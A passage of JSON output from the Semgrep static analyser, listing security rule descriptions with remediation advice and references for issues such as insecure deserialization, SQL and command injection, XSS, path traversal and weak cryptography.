- [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://pandas.pydata.org/docs/reference/api/pandas.read_pickle.html](https://pandas.pydata.org/docs/reference/api/pandas.read_pickle.html)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://redfoxsec.com/blog/insecure-deserialization-in-python/](https://redfoxsec.com/blog/insecure-deserialization-in-python/)\n - [https://www.exploit-db.com/exploits/49585](https://www.exploit-db.com/exploits/49585)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_pickle()` function uses `pickle` for object deserialization and should not be used with untrusted data."},"helpUri":"https://semgrep.dev/r/python.lang.deserialization.tainted-pandas-pickle.tainted-pandas-pickle","id":"python.lang.deserialization.tainted-pandas-pickle.tainted-pandas-pickle","name":"python.lang.deserialization.tainted-pandas-pickle.tainted-pandas-pickle","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.deserialization.tainted-pandas-pickle.tainted-pandas-pickle"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Should not use SHA1 to generate hashes. There is a proven SHA1 hash collision by Google, which could lead to vulnerabilities. Use SHA256, SHA3 or other hashing functions instead."},"help":{"markdown":"Should not use SHA1 to generate hashes. There is a proven SHA1 hash collision by Google, which could lead to vulnerabilities. Use SHA256, SHA3 or other hashing functions instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.lang.security.weak-hashes-sha1.weak-hashes-sha1)\n - [https://security.googleblog.com/2017/02/announcing-first-sha1-collision.html](https://security.googleblog.com/2017/02/announcing-first-sha1-collision.html)\n - [https://shattered.io/](https://shattered.io/)\n","text":"Should not use SHA1 to generate hashes. There is a proven SHA1 hash collision by Google, which could lead to vulnerabilities. Use SHA256, SHA3 or other hashing functions instead."},"helpUri":"https://semgrep.dev/r/ruby.lang.security.weak-hashes-sha1.weak-hashes-sha1","id":"ruby.lang.security.weak-hashes-sha1.weak-hashes-sha1","name":"ruby.lang.security.weak-hashes-sha1.weak-hashes-sha1","properties":{"precision":"very-high","tags":["CWE-328: Use of Weak Hash","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.lang.security.weak-hashes-sha1.weak-hashes-sha1"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Flask-Login provides session protection to help prevent user sessions from being stolen. When this is active, sessions will be marked as non-fresh when the user's IP or user agent is changed. It is not advised to disable this feature."},"help":{"markdown":"Flask-Login provides session protection to help prevent user sessions from being stolen. When this is active, sessions will be marked as non-fresh when the user's IP or user agent is changed. It is not advised to disable this feature.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.web.flask-login-session-protection-app-config-none.flask-login-session-protection-app-config-none)\n - [https://flask-login.readthedocs.io/en/latest/#session-protection](https://flask-login.readthedocs.io/en/latest/#session-protection)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"Flask-Login provides session protection to help prevent user sessions from being stolen. When this is active, sessions will be marked as non-fresh when the user's IP or user agent is changed. It is not advised to disable this feature."},"helpUri":"https://semgrep.dev/r/python.flask.web.flask-login-session-protection-app-config-none.flask-login-session-protection-app-config-none","id":"python.flask.web.flask-login-session-protection-app-config-none.flask-login-session-protection-app-config-none","name":"python.flask.web.flask-login-session-protection-app-config-none.flask-login-session-protection-app-config-none","properties":{"precision":"very-high","tags":["CWE-613: Insufficient Session Expiration","HIGH CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.web.flask-login-session-protection-app-config-none.flask-login-session-protection-app-config-none"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected user input entering a `subprocess` call unsafely. This could result in a command injection vulnerability. An attacker could use this vulnerability to execute arbitrary commands on the host, which allows them to download malware, scan sensitive data, or run any command they wish on the server. Do not let users choose the command to run. In general, prefer to use Python API versions of system commands. If you must use subprocess, use a dictionary to allowlist a set of commands."},"help":{"markdown":"Detected user input entering a `subprocess` call unsafely. This could result in a command injection vulnerability. An attacker could use this vulnerability to execute arbitrary commands on the host, which allows them to download malware, scan sensitive data, or run any command they wish on the server. Do not let users choose the command to run. In general, prefer to use Python API versions of system commands. If you must use subprocess, use a dictionary to allowlist a set of commands.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.security.injection.subprocess-injection.subprocess-injection)\n - [https://semgrep.dev/docs/cheat-sheets/python-command-injection/](https://semgrep.dev/docs/cheat-sheets/python-command-injection/)\n","text":"Detected user input entering a `subprocess` call unsafely. This could result in a command injection vulnerability. An attacker could use this vulnerability to execute arbitrary commands on the host, which allows them to download malware, scan sensitive data, or run any command they wish on the server. Do not let users choose the command to run. In general, prefer to use Python API versions of system commands. If you must use subprocess, use a dictionary to allowlist a set of commands."},"helpUri":"https://semgrep.dev/r/python.flask.security.injection.subprocess-injection.subprocess-injection","id":"python.flask.security.injection.subprocess-injection.subprocess-injection","name":"python.flask.security.injection.subprocess-injection.subprocess-injection","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.security.injection.subprocess-injection.subprocess-injection"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"DSA is a legacy algorithm and should generally be avoided in favor of choices like EdDSA using curve25519 or ECDSA. In general, low-level cryptographic primitives, found in the `cryptography.hazmat package`, are complex and potentially dangerous, requiring deep cryptographic knowledge. It is recommended to use the higher-level recipes layer as a secure default and resort to the hazmat layer only when necessary."},"help":{"markdown":"DSA is a legacy algorithm and should generally be avoided in favor of choices like EdDSA using curve25519 or ECDSA. In general, low-level cryptographic primitives, found in the `cryptography.hazmat package`, are complex and potentially dangerous, requiring deep cryptographic knowledge. It is recommended to use the higher-level recipes layer as a secure default and resort to the hazmat layer only when necessary.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.cryptography.cryptography-dsa.cryptography-dsa)\n - [https://cryptography.io/en/latest/hazmat/primitives/asymmetric/dsa/](https://cryptography.io/en/latest/hazmat/primitives/asymmetric/dsa/)\n - [https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.186-5.pdf](https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.186-5.pdf)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n - [https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/04-Testing_for_Weak_Encryption](https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/04-Testing_for_Weak_Encryption)\n - [https://words.filippo.io/dispatches/dsa/](https://words.filippo.io/dispatches/dsa/)\n","text":"DSA is a legacy algorithm and should generally be avoided in favor of choices like EdDSA using curve25519 or ECDSA. In general, low-level cryptographic primitives, found in the `cryptography.hazmat package`, are complex and potentially dangerous, requiring deep cryptographic knowledge. It is recommended to use the higher-level recipes layer as a secure default and resort to the hazmat layer only when necessary."},"helpUri":"https://semgrep.dev/r/python.cryptography.cryptography-dsa.cryptography-dsa","id":"python.cryptography.cryptography-dsa.cryptography-dsa","name":"python.cryptography.cryptography-dsa.cryptography-dsa","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.cryptography.cryptography-dsa.cryptography-dsa"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Detected a cookie options with the `SameSite` flag set to \"None\". This is a potential security risk that arises from the way web browsers manage cookies. In a typical web application, cookies are used to store and transmit session-related data between a client and a server. To enhance security, cookies can be marked with the \"SameSite\" attribute, which restricts their usage based on the origin of the page that set them. This attribute can have three values: \"Strict,\" \"Lax,\" or \"None\". Make sure that the choice of the `None` value is intentional and that you understand the potential security implications. When `SameSite` is set to \"Strict\", no 3rd party cookie will be sent with outgoing requests. While 'Strict' is the most secure option, 'Lax' is a good compromise between security and usability and this default value is secure for most applications. A secure default approach would consist of creating a custom response class, overriding the `set_cookie` method to set this flag to `Lax` by default, setting the `response_class` attribute of your Flask app to use the custom response class, setting the flag a different value on a case-by-case basis only when necessary."},"help":{"markdown":"Detected a cookie options with the `SameSite` flag set to \"None\". This is a potential security risk that arises from the way web browsers manage cookies. In a typical web application, cookies are used to store and transmit session-related data between a client and a server. To enhance security, cookies can be marked with the \"SameSite\" attribute, which restricts their usage based on the origin of the page that set them. This attribute can have three values: \"Strict,\" \"Lax,\" or \"None\". Make sure that the choice of the `None` value is intentional and that you understand the potential security implications. When `SameSite` is set to \"Strict\", no 3rd party cookie will be sent with outgoing requests. While 'Strict' is the most secure option, 'Lax' is a good compromise between security and usability and this default value is secure for most applications. A secure default approach would consist of creating a custom response class, overriding the `set_cookie` method to set this flag to `Lax` by default, setting the `response_class` attribute of your Flask app to use the custom response class, setting the flag a different value on a case-by-case basis only when necessary.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.web.flask-cookie-samesite-missing.flask-cookie-samesite-missing)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://web.dev/articles/samesite-cookies-explained](https://web.dev/articles/samesite-cookies-explained)\n","text":"Detected a cookie options with the `SameSite` flag set to \"None\". This is a potential security risk that arises from the way web browsers manage cookies. In a typical web application, cookies are used to store and transmit session-related data between a client and a server. To enhance security, cookies can be marked with the \"SameSite\" attribute, which restricts their usage based on the origin of the page that set them. This attribute can have three values: \"Strict,\" \"Lax,\" or \"None\". Make sure that the choice of the `None` value is intentional and that you understand the potential security implications. When `SameSite` is set to \"Strict\", no 3rd party cookie will be sent with outgoing requests. While 'Strict' is the most secure option, 'Lax' is a good compromise between security and usability and this default value is secure for most applications. A secure default approach would consist of creating a custom response class, overriding the `set_cookie` method to set this flag to `Lax` by default, setting the `response_class` attribute of your Flask app to use the custom response class, setting the flag a different value on a case-by-case basis only when necessary."},"helpUri":"https://semgrep.dev/r/python.flask.web.flask-cookie-samesite-missing.flask-cookie-samesite-missing","id":"python.flask.web.flask-cookie-samesite-missing.flask-cookie-samesite-missing","name":"python.flask.web.flask-cookie-samesite-missing.flask-cookie-samesite-missing","properties":{"precision":"very-high","tags":["CWE-1275: Sensitive Cookie with Improper SameSite Attribute","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.web.flask-cookie-samesite-missing.flask-cookie-samesite-missing"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.file.tainted-path-traversal-pillow-django.tainted-path-traversal-pillow-django)\n - [https://docs.pyfilesystem.org/en/latest/guide.html#opening-filesystems](https://docs.pyfilesystem.org/en/latest/guide.html#opening-filesystems)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://portswigger.net/web-security/file-path-traversal](https://portswigger.net/web-security/file-path-traversal)\n - [https://www.stackhawk.com/blog/django-path-traversal-guide-examples-and-prevention/](https://www.stackhawk.com/blog/django-path-traversal-guide-examples-and-prevention/)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files."},"helpUri":"https://semgrep.dev/r/python.django.file.tainted-path-traversal-pillow-django.tainted-path-traversal-pillow-django","id":"python.django.file.tainted-path-traversal-pillow-django.tainted-path-traversal-pillow-django","name":"python.django.file.tainted-path-traversal-pillow-django.tainted-path-traversal-pillow-django","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.file.tainted-path-traversal-pillow-django.tainted-path-traversal-pillow-django"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected the decoding of a JWT token without a verify step. JWT tokens must be verified before use, otherwise the token's integrity is unknown. This means a malicious actor could forge a JWT token with any claims. Validate the token before using it."},"help":{"markdown":"Detected the decoding of a JWT token without a verify step. JWT tokens must be verified before use, otherwise the token's integrity is unknown. This means a malicious actor could forge a JWT token with any claims. Validate the token before using it.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.dotnet-core.jwt.jwt-decode-without-verify.jwt-decode-without-verify)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n","text":"Detected the decoding of a JWT token without a verify step. JWT tokens must be verified before use, otherwise the token's integrity is unknown. This means a malicious actor could forge a JWT token with any claims. Validate the token before using it."},"helpUri":"https://semgrep.dev/r/csharp.dotnet-core.jwt.jwt-decode-without-verify.jwt-decode-without-verify","id":"csharp.dotnet-core.jwt.jwt-decode-without-verify.jwt-decode-without-verify","name":"csharp.dotnet-core.jwt.jwt-decode-without-verify.jwt-decode-without-verify","properties":{"precision":"very-high","tags":["CWE-345: Insufficient Verification of Data Authenticity","HIGH CONFIDENCE","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.dotnet-core.jwt.jwt-decode-without-verify.jwt-decode-without-verify"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. Validate the user input, perform contextual output encoding, or sanitize the input. If you have to use dangerouslySetInnerHTML, consider using a sanitization library such as DOMPurify to sanitize the HTML within."},"help":{"markdown":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. Validate the user input, perform contextual output encoding, or sanitize the input. If you have to use dangerouslySetInnerHTML, consider using a sanitization library such as DOMPurify to sanitize the HTML within.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/typescript.react.react-dangerouslysetinnerhtml-url.react-dangerouslysetinnerhtml-url)\n - [https://react.dev/reference/react-dom/components/common#dangerously-setting-the-inner-html](https://react.dev/reference/react-dom/components/common#dangerously-setting-the-inner-html)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)\n","text":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. Validate the user input, perform contextual output encoding, or sanitize the input. If you have to use dangerouslySetInnerHTML, consider using a sanitization library such as DOMPurify to sanitize the HTML within."},"helpUri":"https://semgrep.dev/r/typescript.react.react-dangerouslysetinnerhtml-url.react-dangerouslysetinnerhtml-url","id":"typescript.react.react-dangerouslysetinnerhtml-url.react-dangerouslysetinnerhtml-url","name":"typescript.react.react-dangerouslysetinnerhtml-url.react-dangerouslysetinnerhtml-url","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: typescript.react.react-dangerouslysetinnerhtml-url.react-dangerouslysetinnerhtml-url"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.system-command.command-injection-path.command-injection-path)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://wiki.sei.cmu.edu/confluence/display/c/STR02-C.+Sanitize+data+passed+to+complex+subsystems](https://wiki.sei.cmu.edu/confluence/display/c/STR02-C.+Sanitize+data+passed+to+complex+subsystems)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.system-command.command-injection-path.command-injection-path","id":"cpp.lang.security.system-command.command-injection-path.command-injection-path","name":"cpp.lang.security.system-command.command-injection-path.command-injection-path","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.system-command.command-injection-path.command-injection-path"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected use of an insecure SSL version. Secure SSL versions are TLSv1.2 and TLS1.3; older versions are known to be broken and are susceptible to attacks. Prefer use of TLSv1.2 or later."},"help":{"markdown":"Detected use of an insecure SSL version. Secure SSL versions are TLSv1.2 and TLS1.3; older versions are known to be broken and are susceptible to attacks. Prefer use of TLSv1.2 or later.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.nginx.security.insecure-ssl-version.insecure-ssl-version)\n - [https://www.acunetix.com/blog/web-security-zone/hardening-nginx/](https://www.acunetix.com/blog/web-security-zone/hardening-nginx/)\n - [https://www.acunetix.com/blog/articles/tls-ssl-cipher-hardening/](https://www.acunetix.com/blog/articles/tls-ssl-cipher-hardening/)\n","text":"Detected use of an insecure SSL version. Secure SSL versions are TLSv1.2 and TLS1.3; older versions are known to be broken and are susceptible to attacks. Prefer use of TLSv1.2 or later."},"helpUri":"https://semgrep.dev/r/generic.nginx.security.insecure-ssl-version.insecure-ssl-version","id":"generic.nginx.security.insecure-ssl-version.insecure-ssl-version","name":"generic.nginx.security.insecure-ssl-version.insecure-ssl-version","properties":{"precision":"very-high","tags":["CWE-326: Inadequate Encryption Strength","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: generic.nginx.security.insecure-ssl-version.insecure-ssl-version"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. When building SQL queries in Go, it is possible to adopt prepared statements by using the `Prepare` and `PrepareContext` calls with parameterized queries. For more information, see: [Prepared statements in Go](https://go.dev/doc/database/prepared-statements)."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. When building SQL queries in Go, it is possible to adopt prepared statements by using the `Prepare` and `PrepareContext` calls with parameterized queries. For more information, see: [Prepared statements in Go](https://go.dev/doc/database/prepared-statements).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.grpc.sql.grpc-pg-sqli-taint-med-conf.grpc-pg-sqli-taint-med-conf)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://pg.uptrace.dev/queries/](https://pg.uptrace.dev/queries/)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. When building SQL queries in Go, it is possible to adopt prepared statements by using the `Prepare` and `PrepareContext` calls with parameterized queries. For more information, see: [Prepared statements in Go](https://go.dev/doc/database/prepared-statements)."},"helpUri":"https://semgrep.dev/r/go.grpc.sql.grpc-pg-sqli-taint-med-conf.grpc-pg-sqli-taint-med-conf","id":"go.grpc.sql.grpc-pg-sqli-taint-med-conf.grpc-pg-sqli-taint-med-conf","name":"go.grpc.sql.grpc-pg-sqli-taint-med-conf.grpc-pg-sqli-taint-med-conf","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: go.grpc.sql.grpc-pg-sqli-taint-med-conf.grpc-pg-sqli-taint-med-conf"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"User-controlled data from request is passed to 'RawSQL()'. This could lead to a SQL injection and therefore protected information could be leaked. Instead, use parameterized queries or escape the user-controlled data by using `params` and not using quote placeholders in the SQL string."},"help":{"markdown":"User-controlled data from request is passed to 'RawSQL()'. This could lead to a SQL injection and therefore protected information could be leaked. Instead, use parameterized queries or escape the user-controlled data by using `params` and not using quote placeholders in the SQL string.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.security.injection.sql.sql-injection-rawsql.sql-injection-using-rawsql)\n - [https://docs.djangoproject.com/en/3.0/ref/models/expressions/#django.db.models.expressions.RawSQL](https://docs.djangoproject.com/en/3.0/ref/models/expressions/#django.db.models.expressions.RawSQL)\n","text":"User-controlled data from request is passed to 'RawSQL()'. This could lead to a SQL injection and therefore protected information could be leaked. Instead, use parameterized queries or escape the user-controlled data by using `params` and not using quote placeholders in the SQL string."},"helpUri":"https://semgrep.dev/r/python.django.security.injection.sql.sql-injection-rawsql.sql-injection-using-rawsql","id":"python.django.security.injection.sql.sql-injection-rawsql.sql-injection-using-rawsql","name":"python.django.security.injection.sql.sql-injection-rawsql.sql-injection-using-rawsql","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.security.injection.sql.sql-injection-rawsql.sql-injection-using-rawsql"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"MD5 hash algorithm detected. This is not collision resistant and leads to easily-cracked password hashes. Replace with current recommended hashing algorithms."},"help":{"markdown":"MD5 hash algorithm detected. This is not collision resistant and leads to easily-cracked password hashes. Replace with current recommended hashing algorithms.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/clojure.lang.security.use-of-md5.use-of-md5)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html)\n","text":"MD5 hash algorithm detected. This is not collision resistant and leads to easily-cracked password hashes. Replace with current recommended hashing algorithms."},"helpUri":"https://semgrep.dev/r/clojure.lang.security.use-of-md5.use-of-md5","id":"clojure.lang.security.use-of-md5.use-of-md5","name":"clojure.lang.security.use-of-md5.use-of-md5","properties":{"precision":"very-high","tags":["CWE-328: Use of Weak Hash","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: clojure.lang.security.use-of-md5.use-of-md5"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. The driver API has the ability to bind parameters to the query in a safe way. Make sure not to dynamically create SQL queries from user-influenced inputs. If you cannot avoid this, either escape the data properly or create an allowlist to check the value."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. The driver API has the ability to bind parameters to the query in a safe way. Make sure not to dynamically create SQL queries from user-influenced inputs. If you cannot avoid this, either escape the data properly or create an allowlist to check the value.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.db.generic-sql-fastapi.generic-sql-fastapi)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. The driver API has the ability to bind parameters to the query in a safe way. Make sure not to dynamically create SQL queries from user-influenced inputs. If you cannot avoid this, either escape the data properly or create an allowlist to check the value."},"helpUri":"https://semgrep.dev/r/python.fastapi.db.generic-sql-fastapi.generic-sql-fastapi","id":"python.fastapi.db.generic-sql-fastapi.generic-sql-fastapi","name":"python.fastapi.db.generic-sql-fastapi.generic-sql-fastapi","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.db.generic-sql-fastapi.generic-sql-fastapi"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"help":{"markdown":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.redis.ruby-redis-sentinels-empty-password.ruby-redis-sentinels-empty-password)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security 